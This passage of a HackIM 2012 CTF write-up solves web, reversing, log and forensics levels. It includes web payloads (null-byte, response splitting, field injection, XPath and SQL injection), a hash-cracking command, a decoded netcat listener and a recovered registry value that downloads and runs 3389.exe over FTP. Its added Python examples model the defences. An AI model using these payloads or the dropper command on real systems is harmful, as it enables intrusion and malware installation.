    2. The hash thus generated for my system was "243dc4f11700aa3bd6c7de312bb0ca31" (Note: each system will generate a unique hash).
    3. Fire up the Windows console, and type the following at the command prompt: barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a
    4. After approx 2 minutes on my i5, the cracker successfully displayed the result.
  15. (Programming Level 5, continued)

    5. There we had our key as: "1c183e7"
    6. That means "1" + salt("c183e7"), since hash = Algo(password+salt)
    7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31 = md5(1+c183e7)
    8. And finally my flag was c183e7 (Note: each system will have a unique flag)
    Flag: c183e7

    Web Levels

    Web Level 1
    Official Hint: N/A
    Page Source: Nothing Interesting
    Description: Can you view the bytes in password.asp from Me?
    Analysis: As the description suggests, it was null byte injection. I had come across a problem on null bytes in one of the wargames. Let's understand the problem. Our challenge was to read the information from the file password.asp, which somehow was protected by the server. Here we can observe in the given URL that the default parameter is test.txt. Multiple questions can arise here, such as: why only test.txt as the parameter? If you don't do anything with a parameter, why take one? Assume a real-time application from my perspective; the idea with this level is that we have an application which takes a filename from us, reads it, and shows it to us. We found an example of input, "test.txt". We know there is sensitive information in password.asp, but we can't get password.asp. So let's imagine that whoever wrote this application, which reads any file we tell it to, wanted to keep us from reading anything but files which end in ".txt". So any input we give it that doesn't end in ".txt" is rejected. So here's the problem: how do we get a file which ends in ".asp" when the filename we provide has to end in ".txt"? The answer obviously is the null byte, but that would be a partial answer in the context of the question "HOW?" In languages like ASP and PHP, the null byte doesn't end a string, it's just another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if we give a PHP script a filename to open that has a null byte, it's different in PHP and in the OS. So the filename might be "hello%00blah" to PHP. But it would be "hello" to the operating system.
    Some applications append a file extension to the end of any filename we give them. So we give them "hello" and they open "hello.txt". Which is why we do "hello.php%00". Because PHP sees "hello.php%00.txt" and the OS sees "hello.php". And after this long, boring, worthless explanation, hence the flag.
    Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
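The two views of one filename described above, modelled as an added Python example that is not the challenge's code: naive_allows is the suffix-only check the level implies, c_string_view is what a layer that stops at the first NUL byte sees, and hardened_allows is the check that closes the gap (reject NUL outright, resolve the path under the document folder, then test the suffix on the resolved name). The folder and file names are constructed.

```python
import posixpath

# Web Level 1. Added example, not the challenge's code. The filter and the file
# open disagree about where the string ends, so "password.asp\0.txt" satisfies
# an ends-with-".txt" test and still opens password.asp.


def naive_allows(requested):
    """The check the challenge page implies: look at the suffix, nothing else."""
    return requested.endswith(".txt")


def c_string_view(name):
    """What a C-based layer sees: everything up to the first NUL byte."""
    return name.split("\x00", 1)[0]


def hardened_allows(requested, web_root="/srv/app/files"):
    """Reject NUL bytes, normalise the path, confine it to web_root, then test the suffix.
    web_root is a constructed location for the example."""
    if not requested or "\x00" in requested:
        return False
    root = web_root.rstrip("/")
    resolved = posixpath.normpath(posixpath.join(root, requested))
    if not resolved.startswith(root + "/"):
        return False                      # ".." walked out of the folder
    return resolved.endswith(".txt")


if __name__ == "__main__":
    payload = "password.asp\x00.txt"     # the request from the page, with %00 decoded
    print(naive_allows(payload), c_string_view(payload))   # True password.asp
    print(hardened_allows(payload))                        # False
    print(hardened_allows("test.txt"))                     # True
```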
  16. Web Level 2:

    Official Hint: Judgment of Solomon
    Page Source: Nothing Interesting
    Description: Can you redirect ME to hackim.null.co.in?
    Analysis: I had to go through the hint to get this one done. After a few attempts with variations of parameters, I arbitrarily had to go through the boring story on Wikipedia. The summary of the story was: "Solomon suggested that the baby be split in half and each half given to one of the women claiming to be the mother". So, the hint refers to the word "split". A quick search with the string "HTTP Splitting" returned several results. Studied a few of them, showing various PoCs, and realized that I had spent most of my time injecting the HTTP response rather than redirecting it. Hence finally I got the level done with several parameter variations.
    Flag: http://www.nullcon.net/challenge/wlevel-2-proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in
    ===========================================================================================

    Web Level 3:
    Official Hint: Proxies are golden friends
    Page Source: <!-- If you're still reading, better register Mate :)-->
    Description: Click here to Login || Click here to Register
    Analysis: In this level we were entertained with two options, register and login. I clicked on both of them and went through the page source; nothing seemed interesting. Had a thought that it could be vulnerable to some kind of injection. In the next step I filled up the form and registered. Wow, my registration was successful; didn't expect that though. But on login with those credentials all I got was an error message, "Only ADMINS are Welcome!". Came back again to the registration page and tried with another input. There I observed the page source, and cool, we had something interesting this time, in this format:
    <!--Debug Info: INSERT 'uname|pass|uname|[email protected]|admin:no|comment:new user' INTO USER DB FILE -->
    So, it was all here: the parameter with admin:no was passed into the database.
    Now there was not much to do; next I used Burp Suite to check how the parameters were passed.
  17. (Web Level 3, continued)

    On the last line we can observe inside the window how the parameters are passed to the server. This format was similar to what we got earlier in the post-registration page source. So all we had to do was add admin:yes as per the format. Even this process annoyed me a lot, since I couldn't get it correct on a single attempt. So, the correct format was:
    username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register
    And finally I registered myself as the admin, and got the flag.
    Flag: b3149ecea4628efd23d2f86e5a723472
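The record format from the debug comment, and why an extra "|admin:yes" inside the email field worked, as an added Python example that is not the challenge's code: a model of the vulnerable record builder and its reader, next to a version that refuses delimiter characters, serialises the record as JSON and sets the admin flag server-side. The field values are the ones the author submitted.

```python
import json

# Web Level 3. Added example, not the challenge's code. The handler stored
# 'uname|pass|uname|email|admin:no|comment:new user' with the submitted fields
# dropped in unescaped, so a '|' inside a field adds fields of its own.

DELIMITERS = ("|", "\n", "\r")


def build_record_vulnerable(uname, password, email):
    """Plain concatenation: every field can smuggle in further fields."""
    return "|".join([uname, password, uname, email, "admin:no", "comment:new user"])


def is_admin_vulnerable(record):
    """A naive reader of the pipe record: the first 'admin:' field decides."""
    for part in record.split("|"):
        if part.startswith("admin:"):
            return part == "admin:yes"
    return False


def has_delimiter(value):
    return any(d in value for d in DELIMITERS)


def build_record_safe(uname, password, email):
    """JSON record with the role decided server-side; None if a field carries a delimiter."""
    if any(has_delimiter(v) for v in (uname, password, email)):
        return None
    return json.dumps({"uname": uname, "pass": password, "email": email,
                       "admin": False, "comment": "new user"})


def is_admin_safe(record):
    return json.loads(record).get("admin") is True


# The value the author put in the email field (URL-decoded).
INJECTED_EMAIL = "admin@localhost.com|admin:yes"

if __name__ == "__main__":
    rec = build_record_vulnerable("me.admin", "admin", INJECTED_EMAIL)
    print(rec)
    print(is_admin_vulnerable(rec))                                   # True
    print(build_record_safe("me.admin", "admin", INJECTED_EMAIL))    # None
```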
  18. Web Level 4: Can You Get Me all the Data?

    Official Hint: if you think you've seen all the data, i'm afraid you're mistaken
    Page Source: Nothing Interesting
    Description: 2007 && 2002
    Analysis: At the beginning of this level, I was getting no idea at all of what really was required with it. After hovering around the links for a few hard hours, I got a cool link on OWASP: https://www.owasp.org/index.php/Interpreter_Injection There were a few interesting attack vectors which I foolishly tried, in vain; had no luck. I noticed the description again and understood it was asking to reveal data from the server, and then I realized that I had blindly tried those injection parameters. On my next attempt I went on looking for cheat sheets on various attack parameters. I collected a few of them and studied those. Those were beyond my understanding. Helplessly shouted in the IRC and got some clue, a clue which again required traversing blindly. Eventually I came across an article: http://palpapers.plynt.com/issues/2005Jul/xpath-injection/ which described XPath injection in simple, understandable language, and then a good cheatsheet over here: http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta-stone/ I tried with those attack vectors, and got the flag unexpectedly with this one: input='] | /* | /foo[bar=' I completed this level blindly, a bad one.
    Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear

    Web Level 5:
    Official Hint: It's SQLi
    Page Source: Nothing Interesting
    Description: Do You Have What IT Takes to Break into the World's Most Secure Login System?
    Analysis: The very first thing anyone would try after looking at the page at first sight was the very common SQL injection (" or 1=1--), and yes, I was on the same side of the coin. As usual I was wrong again. Assuming it to be a blind SQLi, I looked around www.1337day.com and www.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db I got to see a paper on advanced blind SQLi; went through it, and there were some attack vectors against web firewalls. With positive hope I tried, and on the second attempt, using '<>'1 as the username and password, made it to the flag.
    Flag: 47c1b025fa18ea96c33fbb6718688c0f
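Why the textbook payload was blocked but '<>'1 went through, as an added Python example that is not the challenge's code: an in-memory SQLite login with (a) a blocklist in front of string-built SQL, the pattern the level's "firewall" suggests, and (b) a parameterised query, which treats the same input as a literal username. The user table and its one row are constructed.

```python
import re
import sqlite3

# Web Level 5. Added example, not the challenge's code. A blocklist catches the
# well-known "or 1=1--" shape; "'<>'1" contains none of the blocked tokens, yet
# username=''<>'1' evaluates to true for every row once it is spliced into the
# statement. Bound parameters never splice, so the same string is just a username.

BLOCKLIST = re.compile(r"(\bor\b\s+1\s*=\s*1|--|;)", re.IGNORECASE)


def make_db():
    """Constructed user table with a single account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con


def login_blocklisted(con, username, password):
    """Filter first, then concatenate: the approach a blocklisting firewall takes."""
    if BLOCKLIST.search(username) or BLOCKLIST.search(password):
        return False
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return con.execute(sql).fetchone()[0] > 0


def login_parameterised(con, username, password):
    """Bound parameters: the input is data, never part of the statement."""
    row = con.execute("SELECT COUNT(*) FROM users WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    con = make_db()
    payload = "'<>'1"                 # the input the author used for both fields
    print(login_blocklisted(con, "' or 1=1--", "x"))    # False: blocked by the filter
    print(login_blocklisted(con, payload, payload))     # True: WHERE ''<>'1' AND ''<>'1'
    print(login_parameterised(con, payload, payload))   # False: no such user
```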
  19. Reverse Engineering Levels

    Reverse Engineering 1: Basic Test
    Official Hint: N/A
    Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 -->
    Description: justdoit.exe
    Analysis: The given binary seemed suspicious. So before executing it I decided to analyze it and verify whether it was safe to execute. I dumped the binary into a hex editor and observed it. The headers showed that it was UPX packed. I unpacked it using "Universal Extractor" and went through it again; no conclusion. Finally executed it inside the vmbox and analyzed the behaviour. At first I couldn't get anything from it; executed it a few more times and saw the automation done by the exe. Then I went to Google and searched for the string "keyboard automation", and there the first option showed AutoHotKey. Eventually ended up looking for Exe2Ahk at http://www.autohotkey.com/download/Exe2Ahk.exe After successful decompilation, found the flag in plain text.
    Flag: We could talk all day about what AutoHotKey can do for an online poker player

    Reverse Engineering 2: Ask nicely, it will give you what you want
    Official Hint: Take another path.. in general look for interesting code blocks & execute them.. code can be anywhere in the PE, even in data | Resource? No Resource
    Page Source: <!-- md5sum: c786287c7825784a85413695a9e319fc -->
    Description: HackIM.exe
    Analysis: I consider this the most insane level in the whole CTF competition. Nearly spent two hacking days to get past it. To understand the binary, I nearly downloaded all the tools found on Google having the string "PE", went through various articles on reversing PE, and, nothing worse than that, shifted between 3 different debuggers one by one. Ultimately, after tracing the flow of the program several times in the Olly debugger, the following steps led to the flag:
    1. As the hint was suggesting, "No Resource", I loaded the PE into Resource Hacker to see what exactly its meaning was. Encountered the following error.
  20. (Reverse Engineering 2, continued)

    So it was clear from this error that there was something wrong with the resource section.
    2. I turned to the Olly debugger, loaded the PE and went to the memory window (ALT+M).
    3. At offset 0040C000 there was the .rsrc (resource) section. I changed the access to the section from Read to Full Access.
    4. Tried running the program but couldn't get anything desired. Popped over the hint again, and there it was asking to execute the resource section.
    5. So now it was time to place the jump instruction somewhere so as to execute the resource section. Came back to the CPU window (ALT+C).
    6. Just below the program entry point, at offset 00401273, there was a JMP instruction.
  21. (Reverse Engineering 2, continued)

    7. So all I had to do was place the jump over the resource section, which was at the offset address 0040C000.
    8. And finally, running the program, I got the flag in the message box.
    Flag: AreYouHappyNow?
  22. Reverse Engineering 3: null Mobile Android App

    Official Hint: N/A
    Page Source: <!-- md5sum: fd81ba87c0edc1f37250e680a49260d8 -->
    Description: We're proud to announce the null Mobile Android App Project; however the application is currently in Beta Phase and requires lot of attention from the testers. In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag.
    Analysis: I didn't have as hard a time with this one as before. I unpacked the apk file with WinRAR and went through the contents. Inside the folder res>raw there were two files, code.js and junk.php. The JavaScript inside code.js was in an unformatted state. I formatted it using http://www.jsbeautifier.org and went through it; couldn't get anything interesting. Next opened the junk.php file in UltraEdit, and after careful observation, there at line 72 I got to see a packed JavaScript function. Finally an online tool at http://www.strictly-software.com/unpacker helped me to unpack the JavaScript function, revealing the flag inside it.
    Flag: Do not let what you cannot do interfere with what you can do.

    Reverse Engineering 4
    Official Hint: we've updated the binary with hints, request all to download again to proceed
    Page Source: <!-- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 --> <!-- <center><h3><a href="data/script">script</a></h3></center> <!-- md5sum: 849f2d8c6e22604cba8fe4904803de10 -->
    Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all to download new RE binary to proceed.
    Analysis: My first attempt with the given file was to analyze its type. I used the file identifier called TrID File Identifier, also available online at http://mark0.net/onlinetrid.aspx. The result showed that it was an ELF binary. So I cross-verified it on the terminal:
It showed that the binary was stripped. I tried executing it and was entertained with an error. I tried the strace and ltrace commands but couldn't learn much from their output. The error indicated something about a time machine, so I turned to Google and looked for anything interesting on "time machine", but couldn't find anything to help. The next thing I did was to change the system date to some earlier year; I changed it to the year 2000. I tried executing the binary again, and voila, there was no error, but no flag either. I tried giving it some parameters but that didn't help. Next I opened a new terminal and looked at the currently running processes using the command ps -aux, and got a long list. It was difficult to figure out, so I filtered it using the command ps -aux | grep script2 and, unexpectedly, got to see a shell script. I went through it, and there our flag was in plaintext.
Flag: Nature has neither kernel nor shell; she is everything at once

Reverse Engineering 5: Got Dumped :(

Official Hint:
Page Source: <!-- md5sum: 043e4cc85c519723fad18dce7502371c -->
Description: lol.rar
Analysis: This challenge was about crash dump analysis. I opened the file in a hex editor, went through a few lines and got the idea that it was a Windows crash dump. Next I installed WinDbg with proper symbol configuration and loaded the dump into it. I was unaware of any such analysis and went through a few links on Google; I got some good information and a few cheat sheets. Ultimately the following steps helped me understand the dump.
1. First we had to recognize the file that caused the crash. The command !analyze -v showed us that stub.exe caused the crash.
2. Next we had to extract stub.exe from the dump to analyze it. For this there is SOS, which is used for .NET debugging (to dump DLLs and EXEs).
3. .load clr10\sos.dll
4. !sam folder_location
5. Now we had stub.exe. Next I loaded stub.exe into OllyDbg. I stepped into the instruction and realized that the jump was passing to the crash portion of the assembly. I tried to bypass it by jumping to the message box function. I got the message box but there was no flag in it. I went back to WinDbg and checked for the PID, since there was a GetProcessID function in the assembly. I got the PID as 0xA60, then I patched GetProcessID to return 0xA60 and finally got the flag.
Flag: TheLastSamurai

=====================================================================
Log Analysis

Log Analysis 1: Basic

Official Hint: N/A
Page Source: <!-- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 -->
Description: report
Analysis: In this challenge the log was not too large, but it took a long time to understand. Every line had a cool piece of information. On carefully observing the lines, I found something very interesting on line number 31:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/
I checked it and, wow, found two files, but at the very next moment realized that the game was still on. It said "Ask the proper question to get the proper answer". I went to the page source and got a little closer to the flag; there was a hint given in a comment:
<!-- askmelater.asp?question=? -->
And to my surprise, with my very first guess, I got the flag. HAPPY!!! The final URL was: http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag
Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis 2: Mystery Password

Official Hint: N/A
Page Source: <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 -->
Description: log3.pcap
Analysis: There wasn't much to this challenge. The log was unexpectedly small and anyone could solve it within a few minutes. I opened the log in Wireshark. The easiest way to read the log was to look at the TCP stream: right-click in the packet list > Follow TCP Stream, which popped up the TCP stream window. The very last line of the stream content revealed the password, and with the next few attempts I got the flag.
Flag: [email protected]
Log Analysis 3: Clever Intruder

Official Hint: N/A
Page Source: <!-- md5sum: 396df3308184a77890cb708f05915f29 -->
Description: access.rar
Analysis: A 25 MB log with approximately 1 lakh (100,000) lines. It seemed nearly impossible to analyze, so I thought for a while and looked around Google for a good log explorer to make the task easier. I got a few, but they were all useless and I wasted my time. I came back to my old favorite UltraEdit and gave a quick glance through the lines. I learnt from the logs that:
- The logs were generated by different scanners.
- There was variation in the source IP.
- Scanning was performed on the same date, within a fixed period of uninterrupted time.
- The HTTP status code for most of the requests was 404.
The last finding proved to be essential: we could assume nothing interesting would be found in a "Page Not Found" response. I tried my level best to separate all those 404 lines into different tabs in UltraEdit. This was a really hectic job; had I had some more knowledge, it wouldn't have been tough to get past this hurdle easily. This level really made me realize how poor I am at this. After long hours of this assumed work, I eventually came across a line with a base64-encoded string "bmMgLWwgLXAgNjY2Ng==", and on decoding got "nc -l -p 6666". In the original log, this was on line number 37409 (UltraEdit).
Flag:
Log Analysis 4:

Official Hint: Exploited!!!
Page Source: <!-- md5sum: afcc45de48c327847c507c68ad7e6bf4 Expected Format: CVE-XXXX-XXXX -->
Description: CVE of the Exploit is the Flag
Analysis: This challenge was all about finding the CVE exhibited by the content of the log. As mentioned, it was a Burp Suite log. To make viewing easier, I renamed the log file to log.xml and opened it in a web browser. Again this log had many 404 Not Found requests. After going through the first few lines, I came across the log entries for TikiWiki; there were other entries for Joomla, but I preferred to go sequentially. Since I am not good with exploit identification, I browsed to http://nvd.nist.gov/ and searched for CVEs for TikiWiki. Most of the results returned CVEs related to XSS, but in our log I couldn't see any such XSS thing, so I went with the exceptions, and eventually got the flag. Honestly I couldn't understand which line in the log referred to the CVE, but I had an answer for the question.
Flag: CVE-2005-1921

Log Analysis 5: Waat Laga Server

Official Hint:
Page Source: <!-- md5sum: c641fa00c0a84fd8fd954b3e75d5d6c8 -->
Description: dump.rar
Analysis: Again 95 MB of logs. I loaded it into Wireshark and tried for a few minutes to look into it; I looked at the first few lines and the last few lines and honestly didn't understand, as it was really difficult to browse through each line one by one. I tried to find some alternate way and couldn't learn much; all I got was some bogus ads for shareware log explorers asking for $$$. I came back to the description again and noticed that for the 3rd flag a name was required. I googled for the string "Local Privilege Escalation Exploit" and the search returned some exploit-db papers. The interesting thing I noticed was a CVE that might help me with author identification. The next challenge was to look for the CVE in such a huge log. I used the cat command but that didn't help, and I tried a few more, but there was no result; eventually I ended up with the strings command to get the CVE.
I also found the paper at http://www.exploit-db.com/exploits/9479/. Finally I got my first flag for the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and understood from the title that it was a local root exploit. Now expectations were high with the strings command, and I extracted all the strings from the dump to a plain text file. The command I used was: strings dump.pcapng > dump.txt. By this time I had a stripped-down version of the log with the more important things. Next I tried to look for the last flag, which was the root password. Since it was a local root exploit, I looked for the pattern root inside dump.txt and got the hash for root. Next I used John the Ripper to crack the hash and got my 2nd flag: zuzana. Onto the hunt for the 3rd flag, which asked to look for the vulnerable parameter. I opened dump.txt and saw that there were many 404s, so again it was time to eliminate those and consider only the successful responses. I tried a few variations and again stripped dump.txt down to ok.txt; now we had much less information to analyze. I went through the file ok.txt and noticed that the parameters page, title and id were common to all the GET requests. Hence, with variation of the parameters, I got the flag successfully. I had to spend too much time with all those iterations and variations; indeed it was one of the levels on which I spent the most time analyzing to get the flag.
Flag:
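Log Analysis 3 and Log Analysis 5 both came down to the same two moves: discard the 404 responses, then look at what remains, once for a base64 blob hidden in a request and once for the parameters shared by every successful GET. The Python below is an added example, not the author's own tooling; it assumes Apache/nginx combined-format lines (the pcap in level 5 was first reduced to text with strings, so the same filtering applies to that output). The five log lines are constructed for the example; the base64 string is the one quoted in level 3.

```python
import base64
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A run of base64 alphabet long enough to be worth trying to decode.
B64_RE = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')
# Substrings that make a decoded blob worth an analyst's attention.
SHELL_MARKERS = ("nc ", "sh ", "bash", "wget", "curl", "/bin/", "cmd.exe", "powershell")

# Constructed sample lines (not from the challenge log).
LOG_LINES = [
    '10.0.0.5 - - [10/Feb/2012:14:02:11 +0530] "GET /index.php?page=home&title=x&id=1 HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Feb/2012:14:02:12 +0530] "GET /admin/ HTTP/1.1" 404 210 "-" "Nikto/2.1.4"',
    '10.0.0.9 - - [10/Feb/2012:14:02:15 +0530] "GET /index.php?page=about&title=y&id=2 HTTP/1.1" 200 1870 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Feb/2012:14:02:18 +0530] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "-" "w3af"',
    '10.0.0.7 - - [10/Feb/2012:14:03:01 +0530] "GET /index.php?page=bmMgLWwgLXAgNjY2Ng==&title=z&id=3 HTTP/1.1" 200 944 "-" "Mozilla/5.0"',
]


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def parse_log(lines):
    """Parse every line, keeping its 1-based line number for later reference."""
    entries = []
    for no, line in enumerate(lines, 1):
        e = parse_line(line)
        if e:
            e["line_no"] = no
            entries.append(e)
    return entries


def drop_status(entries, codes=(404,)):
    """The author's first filter: nothing interesting lives in a Page Not Found."""
    return [e for e in entries if e["status"] not in codes]


def decode_base64_tokens(text):
    """Yield (token, decoded) for each base64 run that decodes to printable ASCII."""
    for token in B64_RE.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad padding/alphabet
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            yield token, raw.decode("ascii")


def find_encoded_commands(entries):
    """Entries whose request, referer or UA carries base64 decoding to shell-like text."""
    hits = []
    for e in entries:
        for field in ("target", "referer", "ua"):
            for token, decoded in decode_base64_tokens(e[field]):
                if any(marker in decoded for marker in SHELL_MARKERS):
                    hits.append((e["line_no"], field, token, decoded))
    return hits


def common_get_parameters(entries):
    """Query-string parameter names present in every GET request of the set."""
    gets = [e for e in entries if e["method"] == "GET"]
    if not gets:
        return set()
    counts = Counter()
    for e in gets:
        counts.update(set(parse_qs(urlsplit(e["target"]).query, keep_blank_values=True)))
    return {name for name, n in counts.items() if n == len(gets)}


if __name__ == "__main__":
    kept = drop_status(parse_log(LOG_LINES))
    for hit in find_encoded_commands(kept):
        print("line %d (%s): %s -> %r" % hit)
    print("parameters in every GET:", sorted(common_get_parameters(kept)))
```

On a real 100,000-line file, feed `parse_log` the file object instead of the list; the line numbers it records are the ones to quote in a report, exactly as the write-up quotes line 37409.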
=====================================================================
Forensics Levels

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

Official Hint:
Page Source: <!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->
Description: While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same. You are asked to find out that code if hidden in the file.
Analysis: This was one of the coolest challenges in the HackIM 2012 CTF. I listened to the audio and observed that there was distortion at certain places, and also heard that the distortion appeared on a single channel. I had earlier used the audio editor "GoldWave". I opened the audio in GoldWave and separated those distortions from the main stream; since the distortion was on a single channel (right), the task became easier. After listening to the distortion it didn't give up any meaning, so I thought of applying some sound effect, and on the very first attempt, applying the reverse effect, I got the flag.
Flag: 12344346765

Forensics Level 2: Andar Ch0r

Official Hint: A night with MS Office
Page Source: <!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->
Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organization. The company sniffed the data being sent and reconstructed it to find that a word document was being sent. The company strongly suspects that there is some hidden passport code in the document. You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number.
Analysis: This challenge was full of twists; I enjoyed solving it. I opened the given Word document and saw some numeric digits; they were hex values, which I converted to ASCII, and was made a fool of. After a while I had doubts about the file and tried to confirm its type using TrID: http://mark0.net/onlinetrid.aspx. The result showed the possibility of the file being an Excel document. I renamed the file to flag.xls and opened it in Excel. Cool, I was on the right path, but now I had no idea what to do. Next I opened the file in Notepad and went through the lines, and somewhere near the end I saw some plain text "Hey Good Job done....." and just below it "Sheet1" and "Sheet2", but I couldn't remember seeing any Sheet2 in flag.xls. So I got the idea that it was hidden. It had been ages since I had worked on any Excel sheet, so I had really forgotten how to hide Excel sheets. I googled and got a link: http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-2007-2010/ So now Sheet2 was visible, but I was still far away from my flag. Again I followed the link, which explained how to use the VB Editor (ALT+F11) to unhide the super hidden worksheet. I saved it, and finally Sheet3 was revealed with the flag in it.
Flag: 6924289
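A worked check for the hidden-sheet trick above, added here as an example rather than code from the write-up. It assumes the modern .xlsx container, where sheet visibility is the `state` attribute of each `<sheet>` element in xl/workbook.xml (Excel's "very hidden" state, xlSheetVeryHidden in VBA, appears there as state="veryHidden"); a legacy binary .xls keeps the same flag in its BOUNDSHEET records and would need a BIFF parser instead. The workbook is constructed in memory so the example runs offline, and `sniff_container` does the job the author used TrID for, using the OLE2 and ZIP magic bytes.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

SML_NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # legacy .doc/.xls compound file


def sniff_container(data):
    """Identify the file by its magic bytes, whatever its extension says."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(b"PK\x03\x04"):
        return "zip"  # OOXML (.docx/.xlsx) or any other zip container
    return "unknown"


def sheet_visibility(xlsx_bytes):
    """[(sheet name, state)] from xl/workbook.xml; a missing state means visible."""
    if sniff_container(xlsx_bytes) != "zip":
        raise ValueError("not an OOXML (zip) container")
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/workbook.xml"))
    return [(s.get("name"), s.get("state", "visible"))
            for s in root.findall("m:sheets/m:sheet", SML_NS)]


def hidden_sheets(xlsx_bytes):
    """Only the sheets Excel would not show in the tab bar."""
    return [(name, state) for name, state in sheet_visibility(xlsx_bytes) if state != "visible"]


# Constructed minimal workbook part: one visible, one hidden, one very hidden sheet.
WORKBOOK_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" state="veryHidden" r:id="rId3"/>
  </sheets>
</workbook>"""


def build_sample_xlsx():
    """A zip holding only the parts this check reads (not a complete, openable workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", WORKBOOK_XML)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_xlsx()
    print(sniff_container(sample))
    for name, state in hidden_sheets(sample):
        print(f"{name}: {state}")
```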
Forensics Level 3: Not Guilty!

Official Hint:
Page Source: <!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->
Description: An employee was suspected of using some malicious files. The employee asserts that he is not guilty because he never used any program except Microsoft word and excel. While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found. You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.
Analysis: This level was all about registry recovery. I had never encountered such an incident, and to understand it I went through several forensics articles on registry recovery. Initially I downloaded a Windows binary of a tool called Yet Another Registry Utility (YARU). I played with it for some time and realized that it wouldn't bring me anywhere near the flag. I quit and went through a few more manuals. Eventually I came across a tool called "reglookup-recover". It was open source; I installed it on Ubuntu and went through the instructions. After this it wasn't very tough to get the flag. I came back to the description and cross-checked the values obtained with the result, ending up solving this level.
Flag:
Value: Shell
Value Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q
Forensics Level 4: Intriguing MBR

Official Hint: Sometimes things spill over
Page Source: <!-- <form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp" onsubmit="return validate_form(this);"> -->
Description: A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact. The initial sector displayed a messy MBR data. As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters
The Drive showed to be a SATA drive with 512 bytes of LBA
